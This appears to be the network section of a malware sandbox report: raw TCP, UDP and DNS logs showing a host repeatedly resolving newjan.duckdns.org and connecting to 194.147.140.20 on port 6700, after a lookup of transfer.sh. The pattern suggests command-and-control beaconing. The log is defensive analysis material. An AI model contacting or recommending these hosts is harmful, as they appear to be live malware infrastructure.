Sep 14, 2021 21:26:32.156523943 CEST	49708	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:32.231604099 CEST	49708	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:32.446342945 CEST	6700	49708	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:32.446939945 CEST	49708	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:32.634984970 CEST	6700	49708	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:32.639889956 CEST	49708	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:32.883464098 CEST	6700	49708	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:32.924818039 CEST	49708	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:32.980452061 CEST	6700	49708	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:33.033010006 CEST	49708	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:33.111706018 CEST	6700	49708	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:33.111980915 CEST	49708	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:33.354351997 CEST	6700	49708	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:33.355196953 CEST	49708	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:33.542329073 CEST	6700	49708	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:33.595570087 CEST	49708	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:33.783094883 CEST	6700	49708	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:33.829962015 CEST	49708	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:33.909110069 CEST	49708	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:34.148926020 CEST	6700	49708	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:34.256117105 CEST	6700	49708	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:34.298758030 CEST	49708	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:34.973778009 CEST	49708	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:39.119266987 CEST	49709	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:39.305571079 CEST	6700	49709	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:39.305748940 CEST	49709	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:39.306857109 CEST	49709	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:39.506937027 CEST	6700	49709	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:39.540112972 CEST	49709	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:39.726851940 CEST	6700	49709	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:39.728358984 CEST	49709	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:39.985733032 CEST	6700	49709	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:39.987476110 CEST	49709	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:40.083254099 CEST	6700	49709	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:40.127293110 CEST	49709	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:40.174321890 CEST	6700	49709	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:40.174438953 CEST	49709	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:40.315810919 CEST	6700	49709	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:40.361661911 CEST	49709	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:40.407723904 CEST	6700	49709	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:40.407850027 CEST	49709	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:40.595242023 CEST	6700	49709	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:40.643157959 CEST	49709	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:40.829828978 CEST	6700	49709	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:40.877348900 CEST	49709	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:40.957524061 CEST	49709	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:41.188990116 CEST	6700	49709	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:41.972390890 CEST	49709	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:46.092258930 CEST	49710	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:46.278575897 CEST	6700	49710	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:46.278757095 CEST	49710	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:46.280250072 CEST	49710	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:46.476865053 CEST	6700	49710	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:46.477262974 CEST	49710	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:46.663599968 CEST	6700	49710	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:46.680676937 CEST	49710	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:46.927833080 CEST	6700	49710	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:46.972687960 CEST	49710	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:47.050898075 CEST	6700	49710	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:47.096904993 CEST	49710	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:47.160125017 CEST	6700	49710	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:47.160289049 CEST	49710	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:47.407620907 CEST	6700	49710	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:47.409192085 CEST	49710	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:47.595674038 CEST	6700	49710	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:47.643615961 CEST	49710	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:47.830447912 CEST	6700	49710	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:47.878086090 CEST	49710	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:47.956939936 CEST	49710	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:48.188718081 CEST	6700	49710	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:48.973364115 CEST	49710	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:53.151585102 CEST	49711	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:53.337780952 CEST	6700	49711	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:53.337930918 CEST	49711	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:53.339262962 CEST	49711	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:53.526937962 CEST	6700	49711	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:57.602847099 CEST	49712	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:57.790843964 CEST	6700	49712	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:57.791146040 CEST	49712	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:57.792026997 CEST	49712	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:57.989651918 CEST	6700	49712	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:57.989845991 CEST	49712	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:58.235589027 CEST	6700	49712	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:58.235851049 CEST	49712	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:58.422382116 CEST	6700	49712	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:58.425127983 CEST	49712	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:58.657886982 CEST	6700	49712	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:58.771862030 CEST	6700	49712	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:58.773766041 CEST	49712	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:58.959889889 CEST	6700	49712	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:58.988852024 CEST	49712	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:59.347695112 CEST	49712	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:59.534665108 CEST	6700	49712	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:59.767085075 CEST	6700	49712	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:59.767771959 CEST	49712	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:59.959181070 CEST	6700	49712	194.147.140.20	192.168.2.5
Sep 14, 2021 21:26:59.959320068 CEST	49712	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:26:59.973110914 CEST	49712	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:00.145462990 CEST	6700	49712	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:00.147597075 CEST	49712	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:04.061619043 CEST	49713	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:04.247634888 CEST	6700	49713	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:04.247859955 CEST	49713	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:04.248996019 CEST	49713	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:04.463393927 CEST	6700	49713	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:04.463967085 CEST	49713	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:04.650110960 CEST	6700	49713	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:04.653060913 CEST	49713	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:04.892297029 CEST	6700	49713	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:04.973953009 CEST	49713	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:05.021719933 CEST	6700	49713	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:05.066936016 CEST	49713	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:05.160423994 CEST	6700	49713	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:05.160542965 CEST	49713	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:05.407618999 CEST	6700	49713	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:05.407686949 CEST	49713	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:05.594085932 CEST	6700	49713	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:05.645265102 CEST	49713	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:05.831271887 CEST	6700	49713	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:05.881830931 CEST	49713	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:05.990901947 CEST	49713	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:06.235703945 CEST	6700	49713	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:06.662651062 CEST	6700	49713	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:06.707823992 CEST	49713	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:06.974726915 CEST	49713	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:11.097760916 CEST	49714	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:11.283704996 CEST	6700	49714	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:11.283956051 CEST	49714	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:11.284697056 CEST	49714	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:11.470799923 CEST	6700	49714	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:15.560488939 CEST	49715	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:15.747980118 CEST	6700	49715	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:15.748172045 CEST	49715	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:15.749195099 CEST	49715	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:15.948590040 CEST	6700	49715	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:15.949533939 CEST	49715	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:16.136075020 CEST	6700	49715	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:16.136271000 CEST	49715	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:16.376411915 CEST	6700	49715	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:16.376571894 CEST	49715	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:16.622659922 CEST	6700	49715	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:16.750590086 CEST	6700	49715	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:16.751660109 CEST	49715	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:16.937836885 CEST	6700	49715	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:16.938654900 CEST	49715	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:17.124682903 CEST	6700	49715	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:17.126085043 CEST	49715	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:17.313776970 CEST	6700	49715	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:17.364873886 CEST	49715	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:18.395896912 CEST	49715	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:22.583259106 CEST	49716	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:22.771310091 CEST	6700	49716	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:22.771420002 CEST	49716	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:22.774802923 CEST	49716	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:22.961256981 CEST	6700	49716	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:27.056432009 CEST	49717	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:27.244374037 CEST	6700	49717	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:27.244553089 CEST	49717	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:27.251848936 CEST	49717	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:27.449073076 CEST	6700	49717	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:27.449372053 CEST	49717	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:27.701530933 CEST	6700	49717	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:27.701807022 CEST	49717	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:27.889044046 CEST	6700	49717	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:27.891844988 CEST	49717	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:28.138957977 CEST	6700	49717	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:28.251147985 CEST	6700	49717	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:28.252986908 CEST	49717	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:28.439768076 CEST	6700	49717	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:28.439853907 CEST	49717	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:28.685889959 CEST	6700	49717	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:28.686062098 CEST	49717	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:28.873856068 CEST	6700	49717	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:28.928509951 CEST	49717	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:29.114710093 CEST	6700	49717	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:29.162885904 CEST	49717	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:29.413669109 CEST	49717	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:33.511403084 CEST	49718	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:33.697681904 CEST	6700	49718	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:33.697972059 CEST	49718	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:33.698705912 CEST	49718	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:33.886936903 CEST	6700	49718	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:38.027179003 CEST	49719	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:38.215198040 CEST	6700	49719	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:38.215517044 CEST	49719	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:38.216229916 CEST	49719	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:38.412389040 CEST	6700	49719	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:38.412942886 CEST	49719	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:38.600842953 CEST	6700	49719	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:38.602152109 CEST	49719	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:38.848983049 CEST	6700	49719	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:38.960530043 CEST	6700	49719	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:38.961194038 CEST	49719	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:39.147614956 CEST	6700	49719	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:39.148685932 CEST	49719	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:39.337986946 CEST	6700	49719	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:39.338144064 CEST	49719	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:39.526962042 CEST	6700	49719	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:39.569931030 CEST	49719	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:27:43.412121058 CEST	6700	49719	194.147.140.20	192.168.2.5
Sep 14, 2021 21:27:43.460892916 CEST	49719	6700	192.168.2.5	194.147.140.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2021 21:23:48.831139088 CEST	57587	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:23:48.857383013 CEST	53	57587	8.8.8.8	192.168.2.5
Sep 14, 2021 21:23:48.942361116 CEST	55432	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:23:48.972364902 CEST	53	55432	8.8.8.8	192.168.2.5
Sep 14, 2021 21:24:20.541126013 CEST	64936	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:24:20.569710970 CEST	53	64936	8.8.8.8	192.168.2.5
Sep 14, 2021 21:25:03.591923952 CEST	52704	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:25:03.718916893 CEST	53	52704	8.8.8.8	192.168.2.5
Sep 14, 2021 21:25:10.059206963 CEST	52212	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:25:10.184360027 CEST	53	52212	8.8.8.8	192.168.2.5
Sep 14, 2021 21:25:17.121184111 CEST	54302	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:25:17.243911982 CEST	53	54302	8.8.8.8	192.168.2.5
Sep 14, 2021 21:25:24.366075993 CEST	53784	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:25:24.490870953 CEST	53	53784	8.8.8.8	192.168.2.5
Sep 14, 2021 21:25:31.197532892 CEST	65307	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:25:31.322355986 CEST	53	65307	8.8.8.8	192.168.2.5
Sep 14, 2021 21:25:37.491239071 CEST	64344	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:25:37.523922920 CEST	53	64344	8.8.8.8	192.168.2.5
Sep 14, 2021 21:25:44.536240101 CEST	62060	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:25:44.658960104 CEST	53	62060	8.8.8.8	192.168.2.5
Sep 14, 2021 21:25:51.509104967 CEST	61805	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:25:51.533634901 CEST	53	61805	8.8.8.8	192.168.2.5
Sep 14, 2021 21:25:58.561618090 CEST	54795	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:25:58.587059021 CEST	53	54795	8.8.8.8	192.168.2.5
Sep 14, 2021 21:26:04.781704903 CEST	49557	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:26:04.902676105 CEST	53	49557	8.8.8.8	192.168.2.5
Sep 14, 2021 21:26:09.429105997 CEST	61733	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:26:09.456605911 CEST	53	61733	8.8.8.8	192.168.2.5
Sep 14, 2021 21:26:15.973562956 CEST	65447	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:26:16.001096010 CEST	53	65447	8.8.8.8	192.168.2.5
Sep 14, 2021 21:26:20.605685949 CEST	52441	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:26:20.728470087 CEST	53	52441	8.8.8.8	192.168.2.5
Sep 14, 2021 21:26:25.303347111 CEST	62176	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:26:25.331617117 CEST	53	62176	8.8.8.8	192.168.2.5
Sep 14, 2021 21:26:31.931859970 CEST	59596	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:26:31.968136072 CEST	53	59596	8.8.8.8	192.168.2.5
Sep 14, 2021 21:26:39.089040995 CEST	65296	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:26:39.117213964 CEST	53	65296	8.8.8.8	192.168.2.5
Sep 14, 2021 21:26:46.060029984 CEST	63183	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:26:46.090024948 CEST	53	63183	8.8.8.8	192.168.2.5
Sep 14, 2021 21:26:53.027087927 CEST	60151	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:26:53.148999929 CEST	53	60151	8.8.8.8	192.168.2.5
Sep 14, 2021 21:26:57.573728085 CEST	56969	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:26:57.600881100 CEST	53	56969	8.8.8.8	192.168.2.5
Sep 14, 2021 21:27:04.026896954 CEST	55161	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:27:04.059890032 CEST	53	55161	8.8.8.8	192.168.2.5
Sep 14, 2021 21:27:11.060544014 CEST	54757	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:27:11.096074104 CEST	53	54757	8.8.8.8	192.168.2.5
Sep 14, 2021 21:27:15.529100895 CEST	49992	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:27:15.558480024 CEST	53	49992	8.8.8.8	192.168.2.5
Sep 14, 2021 21:27:22.457053900 CEST	60075	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:27:22.581969976 CEST	53	60075	8.8.8.8	192.168.2.5
Sep 14, 2021 21:27:27.027710915 CEST	55016	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:27:27.054379940 CEST	53	55016	8.8.8.8	192.168.2.5
Sep 14, 2021 21:27:33.469547987 CEST	64345	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:27:33.497618914 CEST	53	64345	8.8.8.8	192.168.2.5
Sep 14, 2021 21:27:37.899327040 CEST	57128	53	192.168.2.5	8.8.8.8
Sep 14, 2021 21:27:38.024162054 CEST	53	57128	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 14, 2021 21:23:48.831139088 CEST	192.168.2.5	8.8.8.8	0x8aa5	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:03.591923952 CEST	192.168.2.5	8.8.8.8	0x2e32	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:10.059206963 CEST	192.168.2.5	8.8.8.8	0x3c11	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:17.121184111 CEST	192.168.2.5	8.8.8.8	0xb963	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:24.366075993 CEST	192.168.2.5	8.8.8.8	0x67bc	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:31.197532892 CEST	192.168.2.5	8.8.8.8	0x9645	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:37.491239071 CEST	192.168.2.5	8.8.8.8	0xfd3a	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:44.536240101 CEST	192.168.2.5	8.8.8.8	0x8fd7	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:51.509104967 CEST	192.168.2.5	8.8.8.8	0x481	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:58.561618090 CEST	192.168.2.5	8.8.8.8	0xb711	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:04.781704903 CEST	192.168.2.5	8.8.8.8	0xbba6	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:09.429105997 CEST	192.168.2.5	8.8.8.8	0x4404	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:15.973562956 CEST	192.168.2.5	8.8.8.8	0x4d1f	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:20.605685949 CEST	192.168.2.5	8.8.8.8	0x915	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:25.303347111 CEST	192.168.2.5	8.8.8.8	0xdaa4	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:31.931859970 CEST	192.168.2.5	8.8.8.8	0xa2b0	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:39.089040995 CEST	192.168.2.5	8.8.8.8	0x91ee	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:46.060029984 CEST	192.168.2.5	8.8.8.8	0x8d24	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:53.027087927 CEST	192.168.2.5	8.8.8.8	0xb594	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:57.573728085 CEST	192.168.2.5	8.8.8.8	0xc407	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:27:04.026896954 CEST	192.168.2.5	8.8.8.8	0x1fa7	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:27:11.060544014 CEST	192.168.2.5	8.8.8.8	0xa19	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:27:15.529100895 CEST	192.168.2.5	8.8.8.8	0xf6d8	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:27:22.457053900 CEST	192.168.2.5	8.8.8.8	0x54b3	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:27:27.027710915 CEST	192.168.2.5	8.8.8.8	0x47d0	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:27:33.469547987 CEST	192.168.2.5	8.8.8.8	0xa31d	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 21:27:37.899327040 CEST	192.168.2.5	8.8.8.8	0xec4e	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Sep 14, 2021 21:23:48.857383013 CEST	8.8.8.8	192.168.2.5	0x8aa5	No error (0)	transfer.sh	144.76.136.153	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:03.718916893 CEST	8.8.8.8	192.168.2.5	0x2e32	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:10.184360027 CEST	8.8.8.8	192.168.2.5	0x3c11	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:17.243911982 CEST	8.8.8.8	192.168.2.5	0xb963	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:24.490870953 CEST	8.8.8.8	192.168.2.5	0x67bc	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:31.322355986 CEST	8.8.8.8	192.168.2.5	0x9645	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:37.523922920 CEST	8.8.8.8	192.168.2.5	0xfd3a	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:44.658960104 CEST	8.8.8.8	192.168.2.5	0x8fd7	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:25:51.533634901 CEST	8.8.8.8	192.168.2.5	0x481	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
